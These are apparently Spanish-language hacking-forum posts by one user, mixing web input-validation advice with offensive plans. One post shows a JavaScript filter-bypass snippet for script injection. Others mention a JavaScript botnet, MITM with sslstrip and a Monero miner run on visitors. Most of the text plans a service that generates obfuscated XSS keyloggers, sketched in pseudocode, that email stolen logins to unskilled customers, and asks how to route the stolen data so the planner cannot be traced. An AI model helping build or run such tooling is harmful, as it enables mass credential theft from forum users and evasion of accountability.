Mensajes

Usa el input type adecuado solo estás usando text a pesar de soliciar un número y un email.

The required attribute works with the following input types: text, search, url, tel, email, password, date pickers, number, checkbox, radio, and file.

Usar el tipo de input adecuado aseguro que el usuario no se equivoque al introducir los datos o le de sin querer a enviar y se te envien cosas inútiles al server para evitar que trabaje para nada. También evitas que el usuario envie datos erroneos sin darse cuenta.

exp1 y exp2 no las usas, supongo que porque ahí harás la tercera limpieza.

A parte de eso no veo nada más.





No sé como están implementadas las funciones, yo personalmente le hecharía un ojo a la implementación desde la perspectiva de un atacante para ver si hay alguna manera de saltarse la limpieza. Depende que hagas con lo que recibes. Si vas a publicar en el propio sitio, por ejemplo usando un document.write(Texto) si el filtro no es perfecto se pueden hacer cosas tipo:
Ejemplo de filtro inutil solamente buscando < > para evitar inserción de scripts.
Texto = FiltroAntiScripts(Texto);

//Contenido de texto:
var x = 60;
var y = 62;
x = asciiToChar(x);
y = asciiToChar(y);
var texto ="";
texto += x;
texto += "script";
texto += y;
texto += "alert(\"Soy un codigo malicioso xD\")";
texto += x;
texto += "/script"
texto += y;
//Fin contenido de texto.

//Tu código:
document.write(Texto);

Se pueden hacer muchas mierdas así.
Me imagino que la implementación está más que testeada, pero si por ejemplo tienes un decoder en tu código, podrían conseguir llamarlo pasándole como parámetro un script codificado que pase los filtros, pudiendo ejecutar el script desde una url de tu propio sitio. Tras lo cual enviando una url que a simple vista parece segura tipo https://www.elhacker.net/decode="agjw3ben72bfiwb5wk75fjw71637173jlspeb"/post.html

Ya me encontré fallos similares en muchos sitios. Hasta injectando rutas en el nombre de usuario para subir shells a carpetas con permisos o modificar algún archivo para tirar el server cambiándole el contenido a:
I'm an evil atacker, you should be scared. Buuuu.




Hints:
-Validate username serverside.
-Delete the last account created.
-Stop use the same credentials to share your accounts.


Jajaja

Puff, hay infinitas formas, todas requieren de usar software de una forma u otra.
Fake AP. Para que se conecte, le cambias el nombre(SSID) para que tenga el mismo que el router y que se conecte.

Mitm. sslstrip y wireshark.

Cambio de DNS en el router.

Proxy.

Explotación del equipo.

Escaneado al equipo abriendo los puertos internos del router hacia la ip local.

Tengo una botnet en javascript que funciona convinando varios de los métodos anteriores.

Pastebin?? Si quieres poner info que solo leas tu. Lo cifras y listo.

pastebin.com/api

Your Unique Developer API Key
Everybody using our API is required to use a valid Developer API Key. You automatically get a key when you become a member of Pastebin. Please login to your account, and return to this page to find your Developer API Key.

No creo que dure mucho el invento. Jajajaja.

Gracias por la info, sin duda la usaré como hosting de mis códigos y para otros proyectos con menor tráfico.

Igual le hago unos ejecutables con el PHP y otros con el server en node.js con el server y todo hecho con su documentación para que se descargen. Pillo la dirección de correo de las dependencias del ejecutable o desde el propio ejecutable y edito los documentos desde el ejecutable para que recorra el documento y escriba la dirección del correo que se encuentra en el archivo que lo contiene.
No es complicado pero vaya coñazo... Daré prioridad al minador que estoy intentando hacer para cpu con monero, así al menos saco pa un paquete de pipas mientras usan el server y la web

Es un poco overkill pero si, puedes usarlo. Lo único, dado que regex tiende a ser algo lento y para evitar males mayores, limitaría los caracteres (un substr o parecido) para evitar así que me pasen cadenas de 20MB a filtar xD

Saludos

No lo había pensado xDDD.

Lo ideal es validar tanto en el cliente como en el servidor. Por mucho que valides en el cliente, puede usar una herramienta tipo burpsuite, webscarab o cualquier otra herramienta con proxy del estilo para obtener las cabeceras, inyectar el código antes de enviarlas y hacer forward al servidor. Asique la validación por parte del cliente sirve más bien de poco en muchos casos. Valida siempre en el servidor. Si no te gusta PHP usa node.js

Pd: Acabo de fijarme en el código que pusiste. No tiene sentido. javascript se ejecuta en el navegador en el ordenador del usuario que visita la página. PHP se ejecuta en el servidor que tendrás tú en tu casa o en un hosting. No puedes ni ejecutar PHP en el navegador, ni ejecutar javascript en el servidor. (Con node.js sí, pero entonces no usas PHP para nada.)

Si quieres pasar los datos del form desde el navegador(javascript) al servidor PHP, necesitas usar cualquiera de las distintas formas de comunicarse con el servidor con html5 o javascript. Véase sockets, xmlhttp, etc.

#!Drvy es correcto el uso de preg_replace con la misma finalidad?

Es casi lo mismo, solo que con un paso extra, tienes que registrar una cuenta...

1. Yo me registro con tu servidor
2. Me das el script que voy a usar para enviar correos
3. Uso el script para enviar corrreos a quien quiera.

Otra cosa es que el formato quizás no sea lo ideal... pero como quiera, SPAM es SPAM.

1. Requiere que yo proporcione un servidor en el cual te registres o a traves del cual te registres. Me convierto en responsable de ofrecer un servicio ilegal o facilitarlo siendo un elemento necesario de cada infeción.
Como usas el script para enviar a correos a quien quieras?

Creo que no me explique bien.
Caso hipotético.
Tú MinusFour encuentras un xss en este foro en el propio loggin que te permite escribir un codigo javascript con el que puedes inyectar código al sitio. Lo que quieres es un keylogger que se ejecute por parte de todos los usuarios que accedan al foro, así cuando alguien escriba su usuario y contraseña se te envie por correo. Esto implica que tendrás que escribir código.
Mi sitio lo que ofrece es escribir ese código por ti, y que mediante el uso de pocos prompts tengas todo el código listo sin necesidad de que tú tengas que escribir una sola línea de código. Copiar y pegar.

Entonces entras a example.com/Keylogger y ya te salta el prompt:
Introduce el correo al que enviar los datos recabados por el Keylogger:
micorreo@example.com

Script Generado:
《script》
...
...
...
Ofuscar(Keylogger(){obtenerTeclasPulsadasEnLaPestaña();EnviarACorreo(TeclasPulsadas, micorreo@example.com);}
var DetectadoIntentoEnvioDeCredenciales = false;
while (PestañaActiva) {
if (DetectadoIntentoEnvioDeCredenciales) {Keylogger();}}
...
...
...
)《/script》

Ahora solo tienes que ir al formulario del foro, darle a pegar y enviar. El script es inyectado en la página.
Ahora yo StringManolo accedo al apartado del loggin del foro y escribo:
String Manolo micontraseñaesesta

El keylogger captura las credenciales y las envia al correo automáticamente.
Ahora otro usuario accede y se loggea y lo mismo.

Si uso mi servidor o mi hosting para mandar el correo, cuando ElBrujo vea el fuente con el script inyectado verá que los datos que pilla el keylogger son enviados a mi servidor o hosting desde el script. Y eso es lo que no quiero, ya que yo no he sido quien a infectado al sitio.
Para yo no ser localizado tendría que montar una infraestructura, ser muy cuidadoso, mantenerlo activamente para que no sea vulnerado, tenerlo online 24/7 para que el servicio esté activo, etc.
Mucho dolor de cabeza cuando yo lo único que hago es generar un script.

Otra opción es generar el PHP también y que el usuario lo ponga en su server. Pero claro, mi página va dirigida a clientes del sitio que no tengan conocimientos, ya que vienen redirigidos de un scanner que busca XSS y una guía con dorks para hacerlo a mano. Entonces complicaría el proceso para el cliente y aún por encima requiere que el cliente tenga su propio servidor.

Por eso la alternativa que se me ocurre es usar una lista de servicios de terceros que me permitan mandar los datos que obtiene el keylogger mediante correo. Así reduciría toda la complejidad de meter servidores míos o del cliente de por medio y la infección se podría hacer de modo seguro.

Obviamente no todos los sitios se pueden infectar de forma tan fácil. Pero de forma resumida sin entrar en más detalles ese es el problema que quiero solventar y no consigo como hacerlo.

Otro problema es la burrada de tráfico que se puede generar...
Si 100 personas generan un script. Cada persona infecta 10 sitios de media, y cada sitio tiene 100 usuarios de media que introducen credenciales y otras cosas...
Serian 1000 sitios infectados con 100000 usuarios en total que ponen sus credenciales u otras cosas. Y algunos con uso continuado. Lo que podrían generar el envio de millones de correos en relativamente poco tiempo. Lo cual no creo que me lo permita ningún servicio de terceros.

Alguna idea de como o alternativas, workarounds? Es un buen lío para resolverlo xD

Se refieren a la url https://foro.elhacker.net/index.php a mi también me salio el otro día cuando estaban atacando el sitio, que yo estaba fuera de casa y necesariamente tuve que loggearme para poder acceder a un mensaje que publiqué en el foro que quería enseñarle. Lo normal es poder acceder y que se te muestre publicidad no? Pues ni una cosa ni la otra.
Como estaba siendo atacado el sitio pensé que los zombies estaban usando algún elemento del foro como visitantes y se bloqueó, asique no le di importancia.

Aquí abro la url en incógnito y veo todo correctamente, como se supone que se tendría que haber visto.

Dudo mucho que haya un servicio público así, lo utilizarían para mandar spam. Encima, si ya estás usando un correo... de alguna u otra forma te estás vinculando.

Realmente con un hosting gratuito lo puedes hacer, solo necesitas crear la cuenta una vez cubriendo el captcha.

El correo sería para cada usuario del servicio. Tu accedes a mi web, pones la dirección del correo y se te copia el script en el portapapeles. Después solo tienes que ir al sitio con la vulnerabilidad XSS y pastear el código. Así yo no tengo nada que ver con lo que tu hagas con mi script. Si utilizo mi server para recibir los datos generados por el script de cada usuario:
-Se me peta el server.
-El server necesita estar operativo para que funcione el servicio.
-Mi server se convierte en el que "roba" y almacena(temporalmente) información de los usuarios y me hace responsable.
-Si uso un hosting gratuito estoy en las mismas. El hosting tendré que crearlo yo para subministrárselo a los clientes del servicio.

Por eso buscaba alguna forma como mandar los datos que el script obtiene de los usuarios del sitio sin yo tener que estar en el medio.
Pensé en algún servicio como el mencionado o uno para mandar emails desde el navegador sin la necesidad de tener yo un servidor o manejarlo de ninguna forma. Sé que hay varias opciones, pero no consigo encontrar nada que me funcione.

Por eso pregunto por aquí a ver si se os ocurre cualquier alternativa. Tiene que haber un montón de alternativas pero no sé lo que podría funcionar de forma sencilla. El tema es automatizar el proceso para que solo sea introducir el correo, copiar el script generado e insertarlo en la web vulnerable.